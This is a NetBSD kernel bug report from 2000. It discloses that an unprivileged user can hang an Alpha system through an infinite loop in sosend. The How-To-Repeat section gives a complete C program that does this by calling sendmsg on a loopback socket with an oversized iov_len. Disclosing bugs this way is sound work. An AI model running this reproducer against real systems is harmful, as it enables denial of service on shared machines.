Subject: kern/10070: sendmsg syscall may hang system on alpha
To: None <gnats-bugs@gnats.netbsd.org>
From: None <weiss@uni-mainz.de>
List: netbsd-bugs
Date: 05/08/2000 05:28:11
>Number: 10070
>Category: kern
>Synopsis: sendmsg syscall may hang system on alpha
>Confidential: no
>Severity: serious
>Priority: medium
>Responsible: kern-bug-people
>State: open
>Class: sw-bug
>Submitter-Id: net
>Arrival-Date: Mon May 08 05:29:00 PDT 2000
>Closed-Date:
>Last-Modified:
>Originator: Juergen Weiss
>Release: 1.4.2
>Organization:
Universitaet Mainz
>Environment:
NetBSD netadmin.zdv.Uni-Mainz.DE 1.4.1 NetBSD 1.4.1 (LOCAL) #0: Mon Aug 16 18:27:14 MEST 1999 root@netadmin.zdv.Uni-Mainz.DE:/usr/src/sys/arch/alpha/compile/LOCAL alpha
>Description:
Certain args to the sendmsg system call lead to an infinite
loop in the sosend kernel subroutine. Result is, that the system
hangs - that is the process does not give up control, so no
process switching occurs. Any user can trigger this, no special
privs required.
>How-To-Repeat:
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/uio.h>
main()
{
int sd;
struct sockaddr_in addr;
struct msghdr msg;
struct iovec msg_iov;
char buf[1000];
bzero(&msg_iov, sizeof(msg_iov));
msg_iov.iov_base = buf;
msg_iov.iov_len = 4294967368;
bzero(&msg, sizeof(msg));
msg.msg_iov = &msg_iov;
msg.msg_iovlen = 1;
addr.sin_family = AF_INET;
addr.sin_port = htons(21);
addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
sd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sd < 0)
perror("socket err");
if (connect(sd, &addr, sizeof(addr)) < 0)
perror("connect");
sendmsg(sd, &msg, 0);
}
>Fix:
>Release-Note:
>Audit-Trail:
>Unformatted: